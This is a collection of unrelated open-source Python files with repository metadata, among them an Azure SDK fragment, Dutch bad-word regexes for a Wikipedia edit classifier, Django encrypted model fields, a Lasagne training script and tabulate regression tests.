'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(enable_request, 'EnableRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 409]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
enable_receiver.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}/subscribe'} # type: ignore
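# --------------------------------------------------------------------------
# Hedged usage sketch (illustrative, not part of the generated file): this
# operations class is normally reached through the service client's
# `action_groups` attribute rather than instantiated directly. The entry
# points below (MonitorManagementClient, DefaultAzureCredential) are the
# usual ones for azure-mgmt-monitor / azure-identity; treat the exact import
# paths as assumptions about the installed packages.
if __name__ == "__main__":
    import asyncio
    from azure.identity.aio import DefaultAzureCredential
    from azure.mgmt.monitor.aio import MonitorManagementClient
    async def _demo() -> None:
        async with DefaultAzureCredential() as credential:
            async with MonitorManagementClient(credential, "<subscription-id>") as client:
                # maps onto ActionGroupsOperations.get defined above
                group = await client.action_groups.get("<resource-group>", "<action-group>")
                print(group.name)
    asyncio.run(_demo())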
|
Azure/azure-sdk-for-python
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2018_03_01/aio/operations/_action_groups_operations.py
|
Python
|
mit
| 24,867
|
from database import init_db
from flask import Flask
from flask_graphql import GraphQLView
from schema import schema
app = Flask(__name__)
app.debug = True
default_query = '''
{
allEmployees {
edges {
node {
id,
name,
department {
id,
name
},
role {
id,
name
}
}
}
}
}'''.strip()
app.add_url_rule('/graphql', view_func=GraphQLView.as_view('graphql', schema=schema, graphiql=True))
if __name__ == '__main__':
init_db()
app.run()
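# Hedged client-side sketch (not part of the upstream example): once the app
# is running, /graphql accepts standard GraphQL POSTs. The `requests`
# dependency and the localhost URL are assumptions about the caller's
# environment, e.g. _post_query(default_query).
def _post_query(query, url="http://127.0.0.1:5000/graphql"):
    import requests  # assumed installed in the client environment
    response = requests.post(url, json={"query": query})
    response.raise_for_status()
    return response.json()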
|
yfilali/graphql-pynamodb
|
examples/flask_pynamodb/app.py
|
Python
|
mit
| 552
|
from .features import Dictionary, RegexMatches, Stemmed, Stopwords
name = "dutch"
# import outside the try block so the except clause below can reference
# enchant.errors even when the dictionary lookup fails
import enchant
try:
dictionary = enchant.Dict("nl")
except enchant.errors.DictNotFoundError:
raise ImportError("No enchant-compatible dictionary found for 'nl'. " +
"Consider installing 'myspell-nl'.")
dictionary = Dictionary(name + ".dictionary", dictionary.check)
"""
:class:`~revscoring.languages.features.Dictionary` features via
:class:`enchant.Dict` "nl". Provided by `myspell-nl`
"""
try:
from nltk.corpus import stopwords as nltk_stopwords
stopwords = set(nltk_stopwords.words('dutch'))
except LookupError:
raise ImportError("Could not load stopwords for {0}. ".format(__name__) +
"You may need to install the nltk 'stopwords' " +
"corpora. See http://www.nltk.org/data.html")
stopwords = Stopwords(name + ".stopwords", stopwords)
"""
:class:`~revscoring.languages.features.Stopwords` features provided by
:func:`nltk.corpus.stopwords` "dutch"
"""
try:
from nltk.stem.snowball import SnowballStemmer
stemmer = SnowballStemmer("dutch")
except ValueError:
raise ImportError("Could not load stemmer for {0}. ".format(__name__))
stemmed = Stemmed(name + ".stemmed", stemmer.stem)
"""
:class:`~revscoring.languages.features.Stemmed` word features via
:class:`nltk.stem.snowball.SnowballStemmer` "dutch"
"""
badword_regexes = [
r"aars",
r"an(aal|us)\w*",
r"balhaar",
r"drol(len)?",
r"fack(en|ing|s)?", "facking",
r"flikkers?",
r"focking",
r"ge(ile?|lul)",
r"geneukt",
r"hoer(en?)?",
r"homos?",
r"kaka?",
r"kak(hoofd|ken)",
r"k[ae]nker",
r"klootzak(ken)?",
r"klote",
r"kont(gat|je)?",
r"pedo",
r"penis(sen)?",
r"peop",
r"piemels?",
r"pijpen",
r"pik",
r"pimel",
r"pipi",
r"poep(chinees?|en|hoofd)?",
r"poep(ie|je|sex|te?)s?",
r"porno?",
r"neuke?",
r"neuken(de)?",
r"neukt(en?)?",
r"stron(d|t)",
r"suck(s|t)?",
r"zuigt",
r"sukkels?",
r"ter(ing|ten)", "tetten",
r"tieten",
r"vagina",
r"verekte",
r"verkracht",
r"dikzak",
r"dildo",
r"mon?g(olen|ool)?", "mooiboy",
r"negers?",
r"shit",
r"sperma",
r"kut(jes?)?",
r"stelletje",
r"losers?",
r"lul(len)?",
r"reet",
r"scheet", "scheten", r"schijt",
r"diaree",
r"slet",
r"lekkerding",
r"likken"
]
badwords = RegexMatches(name + ".badwords", badword_regexes)
"""
:class:`~revscoring.languages.features.RegexMatches` features via a list of
badword detecting regexes.
"""
informal_regexes = [
r"aap(jes)?",
r"banaan",
r"bent",
r"boe(it)?",
r"doei"
r"dombo",
r"domme",
r"eigelijk",
r"godverdomme",
r"groetjes",
r"gwn",
r"hoi",
r"hal+o+",
r"heb",
r"hee+[jyl]", r"heee+?l",
r"houd?",
r"(?:hoi+)+",
r"hoor",
r"izan",
r"jij",
r"jou",
r"jullie",
r"kaas",
r"klopt",
r"kots",
r"kusjes",
r"le?kke?re?",
r"maarja",
r"mama",
r"nou",
r"oma",
r"ofzo",
r"oke",
r"sexy?",
r"snap",
r"stink(en|t)",
r"stoer",
r"swag",
r"swek",
r"vies", "vieze",
r"vind",
r"vuile",
r"xxx",
r"yeah",
r"zielig",
r"zooi",
r"yolo",
r"zeg"
]
informals = RegexMatches(name + ".informals", informal_regexes)
"""
:class:`~revscoring.languages.features.RegexMatches` features via a list of
informal word detecting regexes.
"""
|
yafeunteun/wikipedia-spam-classifier
|
revscoring/revscoring/languages/dutch.py
|
Python
|
mit
| 3,534
|
# -*- coding: utf-8 -*-
# Copyright 2015-TODAY LasLabs Inc.
# License MIT (https://opensource.org/licenses/MIT).
from carepoint import Carepoint
from sqlalchemy import (Column,
Integer,
Boolean,
ForeignKey,
)
class FdbPemMogc(Carepoint.BASE):
__tablename__ = 'fdrpemogc'
__dbname__ = 'cph'
gcn_seqno = Column(
Integer,
primary_key=True,
autoincrement=False,
)
pemono = Column(
Integer,
ForeignKey('fdrpemmoe.pemono'),
primary_key=True,
)
update_yn = Column(Boolean)
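# Hedged usage sketch: how this mapping is queried is an assumption about the
# surrounding carepoint library (which owns engine/session construction);
# only the model above comes from this file.
#     session.query(FdbPemMogc).filter(
#         FdbPemMogc.gcn_seqno == 1234).all()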
|
laslabs/Python-Carepoint
|
carepoint/models/cph/fdb_pem_mogc.py
|
Python
|
mit
| 643
|
from .sanic import Sanic
from .blueprints import Blueprint
__version__ = '0.1.9'
__all__ = ['Sanic', 'Blueprint']
|
hhstore/flask-annotated
|
sanic/sanic-0.1.9/sanic/__init__.py
|
Python
|
mit
| 116
|
# code adapted from lasagne tutorial
# http://lasagne.readthedocs.org/en/latest/user/tutorial.html
import time
import os
from itertools import product
import numpy as np
from sklearn.cross_validation import KFold
import theano
from theano import tensor as T
import lasagne
from params import nnet_params_dict, feats_train_folder
def set_trace():
from IPython.core.debugger import Pdb
import sys
Pdb(color_scheme='Linux').set_trace(sys._getframe().f_back)
def build_network(input_var, input_shape, nonlins, depth=2,
widths=(1000, 1000, 10), drops=(0.2, 0.5)):
"""
Parameters
----------
input_var : Theano symbolic variable or None (default: None)
Variable representing a network input.
input_shape : tuple of int or None (batchsize, rows, cols)
input_shape of the input. Any element can be set to None to indicate
that dimension is not fixed at compile time
"""
# GlorotUniform is the default mechanism for initializing weights
for i in range(depth):
if i == 0:
network = lasagne.layers.InputLayer(shape=input_shape,
input_var=input_var)
else:
network = lasagne.layers.DenseLayer(network,
widths[i],
nonlinearity=nonlins[i])
        if drops[i] is not None:
network = lasagne.layers.DropoutLayer(network, p=drops[i])
return network
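# Hedged sketch of calling build_network (shapes and nonlinearities are
# illustrative; `None` as the batch dimension follows the docstring):
#     x = T.fmatrix('x')
#     net = build_network(x, (None, 784),
#                         nonlins=(None, lasagne.nonlinearities.rectify,
#                                  lasagne.nonlinearities.softmax),
#                         depth=3, widths=(784, 500, 10),
#                         drops=(0.2, 0.5, None))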
def floatX(X):
return np.asarray(X, dtype=theano.config.floatX)
def zerosX(X):
return np.zeros(X, dtype=theano.config.floatX)
def init_weights(shape):
return theano.shared(floatX(np.random.randn(*shape) * 0.01))
def sgd(cost, params, gamma):
grads = T.grad(cost=cost, wrt=params)
updates = []
for p, g in zip(params, grads):
updates.append([p, p - g * gamma])
return updates
def model(X, w_h, w_o):
h = T.nnet.sigmoid(T.dot(X, w_h))
pyx = T.nnet.softmax(T.dot(h, w_o))
return pyx
def iterate_minibatches(inputs, targets, batchsize, shuffle=False):
assert len(inputs) == len(targets)
if shuffle:
indices = np.arange(len(inputs))
np.random.shuffle(indices)
for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):
if shuffle:
excerpt = indices[start_idx:start_idx + batchsize]
else:
excerpt = slice(start_idx, start_idx + batchsize)
yield inputs[excerpt], targets[excerpt]
def batch_ids(batch_size, x_train, train_idx):
# change to iterator
ids = zip(range(0, len(x_train[train_idx]), batch_size),
range(batch_size, len(x_train[train_idx]), batch_size))
return ids
verbose = True
# train on every perturbed dataset
filepaths = np.loadtxt("include_data.csv", dtype=object, delimiter=",")
for (include, train_filename, test_filename) in filepaths:
if include == '1':
print '\nExecuting {}'.format(train_filename)
# Load training and test sets
x_train = np.load(os.path.join(feats_train_folder,
train_filename)).astype(np.float32)
y_train = x_train[:, -1].astype(int)
# y_train = (np.eye(2, dtype=np.float32)[x_train[:,-1].astype(int)])
# remove label column from x_train
x_train = x_train[:, :-1]
# Network topology
n_obs = x_train.shape[0]
n_inputs = x_train.shape[1]
n_outputs = len(np.unique(y_train))
# Cross-validation and Neural Net parameters
n_folds = nnet_params_dict['n_folds']
alphas = nnet_params_dict['alphas']
gammas = nnet_params_dict['gammas']
decay_rate = nnet_params_dict['decay_rate']
batch_sizes = nnet_params_dict['batch_sizes']
max_epoch = nnet_params_dict['max_epoch']
depth = nnet_params_dict['depth']
widths = nnet_params_dict['widths']
nonlins = nnet_params_dict['nonlins']
drops = nnet_params_dict['drops']
# Dictionary to store results
results_dict = {}
params_mat = [x for x in product(alphas, gammas, batch_sizes)]
params_mat = np.array(params_mat, dtype=theano.config.floatX)
params_mat = np.column_stack((params_mat,
zerosX(params_mat.shape[0]),
zerosX(params_mat.shape[0]),
zerosX(params_mat.shape[0])))
for param_idx in xrange(params_mat.shape[0]):
# load parameters for neural network model
alpha = params_mat[param_idx, 0]
gamma = params_mat[param_idx, 1]
batch_size = int(params_mat[param_idx, 2])
shape = (batch_size, x_train.shape[1])
# choose n_hidden nodes according to ...
n_hidden = int((n_obs / depth) / (alpha*(n_inputs+n_outputs)))
for i in range(1, depth-1):
widths[i] = n_hidden
model_str = ('\nalpha {} gamma {} batch size {} '
'n_hidden {} depth {}'
'\nnonlins {}'
'\ndrops {}'.format(alpha, gamma, batch_size,
n_hidden, depth, nonlins,
drops))
print model_str
# specify input and target theano data types
input_var = T.fmatrix('input')
target_var = T.ivector('target')
# build neural network model
network = build_network(input_var, shape, nonlins, depth, widths,
drops)
# create loss expression for training
"""
py_x = model(input_var, w_h, w_o)
y_x = T.argmax(py_x, axis=1)
cost = T.mean(T.nnet.categorical_crossentropy(py_x, target_var),
dtype=theano.config.floatX)
"""
prediction = lasagne.layers.get_output(network)
loss = lasagne.objectives.categorical_crossentropy(prediction,
target_var)
loss = loss.mean()
# create paraneter update expressions for training
"""
params = [w_h, w_o]
updates = sgd(cost, params, gamma=gamma)
"""
params = lasagne.layers.get_all_params(network, trainable=True)
updates = lasagne.updates.adadelta(loss, params,
learning_rate=gamma,
rho=decay_rate)
# create loss expression for validation and classification accuracy
# Deterministic forward pass to disable droupout layers
test_prediction = lasagne.layers.get_output(network,
deterministic=True)
test_loss = lasagne.objectives.categorical_crossentropy(
test_prediction,
target_var)
test_loss = test_loss.mean()
test_acc = T.mean(T.eq(T.argmax(test_prediction, axis=1),
target_var), dtype=theano.config.floatX)
# compile functions for performing training step and returning
# corresponding training loss
train_fn = theano.function(inputs=[input_var, target_var],
outputs=loss,
updates=updates,
allow_input_downcast=True)
# compile a function to compute the validation loss and accuracy
val_fn = theano.function(inputs=[input_var, target_var],
outputs=[test_loss, test_acc],
allow_input_downcast=True)
# create kfold iterator
kf = KFold(x_train.shape[0], n_folds=n_folds)
error_rates = []
val_losses = []
running_time = []
fold = 1
for train_idx, val_idx in kf:
start_time = time.time()
for i in range(max_epoch):
train_err = 0
train_batches = 0
for start, end in batch_ids(batch_size, x_train,
train_idx):
train_err += train_fn(x_train[train_idx][start:end],
y_train[train_idx][start:end])
train_batches += 1
val_err = 0
val_acc = 0
val_batches = 0
for start, end in batch_ids(batch_size, x_train,
train_idx):
err, acc = val_fn(x_train[val_idx], y_train[val_idx])
val_err += err
val_acc += acc
val_batches += 1
error_rate = (1 - (val_acc / val_batches)) * 100
val_loss = val_err / val_batches
print("Final results:")
print(" val loss:\t\t\t{:.6f}".format(val_loss))
print(" val error rate:\t\t{:.2f} %".format(error_rate))
error_rates.append(error_rate)
val_losses.append(val_loss)
running_time.append(np.around((time.time() -
start_time) / 60., 1))
fold += 1
params_mat[param_idx, 3] = np.mean(error_rates)
params_mat[param_idx, 4] = np.mean(val_losses)
params_mat[param_idx, 5] = np.mean(running_time)
print('alpha {} gamma {} batchsize {} error rate {} '
'validation cost {} '
'running time {}'.format(params_mat[param_idx, 0],
params_mat[param_idx, 1],
params_mat[param_idx, 2],
params_mat[param_idx, 3],
params_mat[param_idx, 4],
params_mat[param_idx, 5]))
# Save params matrix to disk
params_mat.dump(('results/train/{}'
'_results.np').format(train_filename[:-3]))
|
rafaelvalle/MDI
|
nnet_lasagne.py
|
Python
|
mit
| 10,609
|
import os
import binascii
from django.db import models
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils.functional import cached_property
try:
from django.utils.encoding import smart_text
except ImportError:
from django.utils.encoding import smart_str as smart_text
from keyczar import keyczar
class EncryptedFieldException(Exception):
pass
# Simple wrapper around keyczar to standardize the initialization
# of the crypter object and allow for others to extend as needed.
class KeyczarWrapper(object):
def __init__(self, keyname, *args, **kwargs):
self.crypter = keyczar.Crypter.Read(keyname)
def encrypt(self, cleartext):
return self.crypter.Encrypt(cleartext)
def decrypt(self, ciphertext):
return self.crypter.Decrypt(ciphertext)
class EncryptedFieldMixin(object, metaclass=models.SubfieldBase):
"""
EncryptedFieldMixin will use keyczar to encrypt/decrypt data that is being
marshalled in/out of the database into application Django model fields.
This is very helpful in ensuring that data at rest is encrypted and
minimizing the effects of SQL Injection or insider access to sensitive
databases containing sensitive information.
The most basic use of this mixin is to have a single encryption key for all
data in your database. This lives in a Keyczar key directory specified by:
the setting - settings.ENCRYPTED_FIELDS_KEYDIR -
Optionally, you can name specific encryption keys for data-specific purposes
in your model such as:
    special_data = EncryptedCharField( ..., keyname='special_data' )
The Mixin will handle the encryption/decryption seamlessly, but native
SQL queries may need a way to filter data that is encrypted. Using the
optional 'prefix' kwarg will prepend a static identifier to your encrypted
data before it is written to the database.
There are other use cases where you may not wish to encrypt all of the data
in a database. For example, if you have a survey application that allows
users to enter arbitrary questions and answers, users may request sensitive
information to be stored such as SSN, Driver License #, Credit Card, etc.
Your application can detect these sensitive fields, manually encrypt the
data and store that in the database mixed with other cleartext data.
The model should then only decrypt the specific fields needed. Use the
kwarg 'decrypt_only' to specify this behavior and the model will not
encrypt the data inbound and only attempt to decrypt outbound.
Encrypting data will significantly change the size of the data being stored
and this may cause issues with your database column size. Before storing
any encrypted data in your database, ensure that you have the proper
column width otherwise you may experience truncation of your data depending
on the database engine in use.
To have the mixin enforce max field length, either:
a) set ENFORCE_MAX_LENGTH = True in your settings files
b) set 'enforce_max_length' to True in the kwargs of your model.
A ValueError will be raised if the encrypted length of the data (including
prefix if specified) is greater than the max_length of the field.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the EncryptedFieldMixin with the following
optional settings:
* keyname: The name of the keyczar key
* crypter_klass: A custom class that is extended from Keyczar.
* prefix: A static string prepended to all encrypted data
* decrypt_only: Boolean whether to only attempt to decrypt data coming
from the database and not attempt to encrypt the data
being written to the database.
"""
# Allow for custom class extensions of Keyczar.
self._crypter_klass = kwargs.pop('crypter_klass', KeyczarWrapper)
self.keyname = kwargs.pop('keyname', None)
# If settings.DEFAULT_KEY_DIRECTORY, then the key
# is located in DEFAULT_KEY_DIRECTORY/keyname
if self.keyname:
if hasattr(settings, 'DEFAULT_KEY_DIRECTORY'):
self.keydir = os.path.join(
settings.DEFAULT_KEY_DIRECTORY,
self.keyname
)
else:
raise ImproperlyConfigured(
'You must set settings.DEFAULT_KEY_DIRECTORY'
'when using the keyname kwarg'
)
# If the keyname is not defined on a per-field
# basis, then check for the global data encryption key.
if not self.keyname and hasattr(settings, 'ENCRYPTED_FIELDS_KEYDIR'):
self.keydir = settings.ENCRYPTED_FIELDS_KEYDIR
# If we still do not have a keydir, then raise an exception
        if not getattr(self, 'keydir', None):
raise ImproperlyConfigured(
'You must set settings.ENCRYPTED_FIELDS_KEYDIR '
'or name a key with kwarg `keyname`'
)
# The name of the keyczar key without path for logging purposes.
        self.keyname = os.path.basename(self.keydir)
# Prefix encrypted data with a static string to allow filtering
# of encrypted data vs. non-encrypted data using vanilla MySQL queries.
self.prefix = kwargs.pop('prefix', '')
# Allow for model decryption-only, bypassing encryption of data.
# Useful for models that have a sparse amount of data that is required
# to be encrypted.
self.decrypt_only = kwargs.pop('decrypt_only', False)
self._crypter = self._crypter_klass(self.keydir)
# Ensure the encrypted data does not exceed the max_length
# of the database. Data truncation is a possibility otherwise.
self.enforce_max_length = getattr(settings, 'ENFORCE_MAX_LENGTH', False)
if not self.enforce_max_length:
self.enforce_max_length = kwargs.pop('enforce_max_length', False)
super(EncryptedFieldMixin, self).__init__(*args, **kwargs)
def crypter(self):
return self._crypter
def get_internal_type(self):
return 'TextField'
def to_python(self, value):
if value is None or not isinstance(value, str):
return value
if self.prefix and value.startswith(self.prefix):
value = value[len(self.prefix):]
try:
value = self.crypter().decrypt(value)
# value = value.decode('unicode_escape')
except keyczar.errors.KeyczarError:
pass
except UnicodeEncodeError:
pass
except binascii.Error:
pass
return super(EncryptedFieldMixin, self).to_python(value)
def get_prep_value(self, value):
value = super(EncryptedFieldMixin, self).get_prep_value(value)
if value is None or value == '' or self.decrypt_only:
return value
if isinstance(value, str):
value = value.encode('unicode_escape')
# value = value.encode('ascii')
else:
value = str(value)
return self.prefix + self.crypter().encrypt(value)
def get_db_prep_value(self, value, connection, prepared=False):
if not prepared:
value = self.get_prep_value(value)
if self.enforce_max_length:
if (
value
and hasattr(self, 'max_length')
and self.max_length
and len(value) > self.max_length
):
raise ValueError(
'Field {0} max_length={1} encrypted_len={2}'.format(
self.name,
self.max_length,
len(value),
)
)
return value
class EncryptedCharField(EncryptedFieldMixin, models.CharField):
pass
class EncryptedTextField(EncryptedFieldMixin, models.TextField):
pass
class EncryptedDateTimeField(EncryptedFieldMixin, models.DateTimeField):
pass
class EncryptedIntegerField(EncryptedFieldMixin, models.IntegerField):
@cached_property
def validators(self):
"""
See issue https://github.com/defrex/django-encrypted-fields/issues/7
Need to keep all field validators, but need to change `get_internal_type` on the fly
to prevent fail in django 1.7.
"""
self.get_internal_type = lambda: 'IntegerField'
return models.IntegerField.validators.__get__(self)
class EncryptedDateField(EncryptedFieldMixin, models.DateField):
pass
class EncryptedFloatField(EncryptedFieldMixin, models.FloatField):
pass
class EncryptedEmailField(EncryptedFieldMixin, models.EmailField):
pass
class EncryptedBooleanField(EncryptedFieldMixin, models.BooleanField):
pass
try:
from south.modelsinspector import add_introspection_rules
    add_introspection_rules([], [r'^encrypted_fields\.fields\.\w+Field'])
except ImportError:
pass
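# Hedged usage sketch: inside a configured Django project the field classes
# above drop into models like any other field. The model below is an
# illustrative assumption, not part of this module.
#     from django.db import models
#     from encrypted_fields.fields import EncryptedCharField
#     class Patient(models.Model):
#         ssn = EncryptedCharField(max_length=255, keyname='special_data',
#                                  prefix='enc:')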
|
gerhc/django-encrypted-fields
|
encrypted_fields/fields.py
|
Python
|
mit
| 9,173
|
#-*- coding:utf8 -*-
def crawl_folder(folder):
import os
os_objects = []
seen = set([folder])
for os_object_name in os.listdir(folder):
full_path = os.path.normpath(os.path.join(folder, os_object_name))
        if full_path not in seen:
os_objects.append((full_path, os_object_name,))
seen.add(full_path)
return os_objects
class TCustomCounter:
def __init__(self, name, log_stream, verbosity, interval=10):
self.name = name
self.verbosity = verbosity
self.log_stream = log_stream
self.interval = interval
self.value = 0
def add(self):
from datetime import datetime
self.value += 1
if self.verbosity and self.value % self.interval == 0:
self.log_stream.write("Logger: " + self.name + ", value: " + str(self.value) + ", time: " + str(datetime.now())+ "\n")
self.log_stream.flush()
def log_state(self):
from datetime import datetime
self.log_stream.write("Logger: " + self.name + ", value: " + str(self.value) + ", time: " + str(datetime.now())+ "\n")
self.log_stream.flush()
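# Hedged usage sketch for the helpers above (sys.stderr as the log stream is
# an assumption; any writable text stream works):
if __name__ == "__main__":
    import sys
    counter = TCustomCounter("files", sys.stderr, verbosity=1, interval=2)
    for _path, _name in crawl_folder("."):
        counter.add()
    counter.log_state()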
|
mavlyutovrus/light_search
|
lib/utils.py
|
Python
|
mit
| 1,167
|
import io
from pytest import fixture
class _FakeOutputFile(io.StringIO):
def close(self):
self.contents = self.getvalue()
super().close()
@fixture
def fake_output_file():
return _FakeOutputFile()
type_example_values = {
"none": (None,),
"callable": (lambda: None,),
"bool": (True, False),
"digit_int": (0, 2,),
"float": (0.0, 1.2,),
"bytes": (b"", b"bytes"),
"str": ("", "string"),
"list": ([], [None]),
"tuple": ((), (None,)),
"dict": ({}, {None: None}),
"set": (set(), {None}),
}
basic_types = set(type_example_values)
class TypeSets:
int = {"digit_int", "bool"}
# number = int | {"float"}
# digits = {"digit_int", "float"}
# sequence = {"bytes", "str", "list", "tuple"}
# iterable = sequence | {"dict", "set"}
# subscriptable = sequence | {"dict"}
# hashable = basic_types - {"list", "dict", "set"}
for type_name in basic_types:
setattr(TypeSets, type_name, {type_name})
def values_not_from_types(*type_names):
excluded_basic_types = [getattr(TypeSets, name) for name in type_names]
remaining_basic_types = basic_types.difference(*excluded_basic_types)
example_values = []
for basic_type in remaining_basic_types:
example_values.extend(type_example_values[basic_type])
return example_values
@fixture(params=values_not_from_types("int", "none"))
def not_int_or_none(request):
return request.param
@fixture(params=values_not_from_types("str"))
def not_str(request):
return request.param
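# Hedged sketch of a consuming test module (not collected from conftest.py
# itself; `parse_port` is a hypothetical function under test):
#     import pytest
#     def test_parse_port_rejects_bad_types(not_int_or_none):
#         with pytest.raises(TypeError):
#             parse_port(not_int_or_none)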
|
nre/Doxhooks
|
tests/unit_tests/conftest.py
|
Python
|
mit
| 1,575
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the version number from __init__.py
from sqrlserver import __version__
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='sqrlserver',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=__version__,
description='Support library for processing SQRL requests',
long_description=long_description,
# The project's main homepage.
url='https://github.com/Perlkonig/sqrlserver-python',
# Author details
author='Aaron Dalton',
author_email='aaron@daltons.ca',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Security :: Cryptography',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Systems Administration :: Authentication/Directory',
'Topic :: Utilities',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
# What does your project relate to?
    keywords='SQRL authentication cryptography signature verification',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[
'bitstring',
'pynacl',
],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'dev': ['check-manifest'],
'test': ['coverage'],
},
setup_requires=['pytest-runner'],
tests_require=['pytest'],
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
# entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)
|
Perlkonig/sqrlserver-python
|
setup.py
|
Python
|
mit
| 4,350
|
# -*- coding: utf-8 -*-
"""Regression tests."""
from __future__ import print_function
from __future__ import unicode_literals
from tabulate import tabulate, _text_type, _long_type, TableFormat, Line, DataRow
from common import assert_equal, assert_in, skip
def test_ansi_color_in_table_cells():
"Regression: ANSI color in table cells (issue #5)."
colortable = [("test", "\x1b[31mtest\x1b[0m", "\x1b[32mtest\x1b[0m")]
colorlessheaders = ("test", "test", "test")
formatted = tabulate(colortable, colorlessheaders, "pipe")
expected = "\n".join(
[
"| test | test | test |",
"|:-------|:-------|:-------|",
"| test | \x1b[31mtest\x1b[0m | \x1b[32mtest\x1b[0m |",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_alignment_of_colored_cells():
"Regression: Align ANSI-colored values as if they were colorless."
colortable = [
("test", 42, "\x1b[31m42\x1b[0m"),
("test", 101, "\x1b[32m101\x1b[0m"),
]
colorheaders = ("test", "\x1b[34mtest\x1b[0m", "test")
formatted = tabulate(colortable, colorheaders, "grid")
expected = "\n".join(
[
"+--------+--------+--------+",
"| test | \x1b[34mtest\x1b[0m | test |",
"+========+========+========+",
"| test | 42 | \x1b[31m42\x1b[0m |",
"+--------+--------+--------+",
"| test | 101 | \x1b[32m101\x1b[0m |",
"+--------+--------+--------+",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_alignment_of_link_cells():
"Regression: Align links as if they were colorless."
linktable = [
("test", 42, "\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\"),
("test", 101, "\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\"),
]
linkheaders = ("test", "\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\", "test")
formatted = tabulate(linktable, linkheaders, "grid")
expected = "\n".join(
[
"+--------+--------+--------+",
"| test | \x1b]8;;target\x1b\\test\x1b]8;;\x1b\\ | test |",
"+========+========+========+",
"| test | 42 | \x1b]8;;target\x1b\\test\x1b]8;;\x1b\\ |",
"+--------+--------+--------+",
"| test | 101 | \x1b]8;;target\x1b\\test\x1b]8;;\x1b\\ |",
"+--------+--------+--------+",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_alignment_of_link_text_cells():
"Regression: Align links as if they were colorless."
linktable = [
("test", 42, "1\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\2"),
("test", 101, "3\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\4"),
]
linkheaders = ("test", "5\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\6", "test")
formatted = tabulate(linktable, linkheaders, "grid")
expected = "\n".join(
[
"+--------+----------+--------+",
"| test | 5\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\6 | test |",
"+========+==========+========+",
"| test | 42 | 1\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\2 |",
"+--------+----------+--------+",
"| test | 101 | 3\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\4 |",
"+--------+----------+--------+",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_iter_of_iters_with_headers():
"Regression: Generator of generators with a gen. of headers (issue #9)."
def mk_iter_of_iters():
def mk_iter():
for i in range(3):
yield i
for r in range(3):
yield mk_iter()
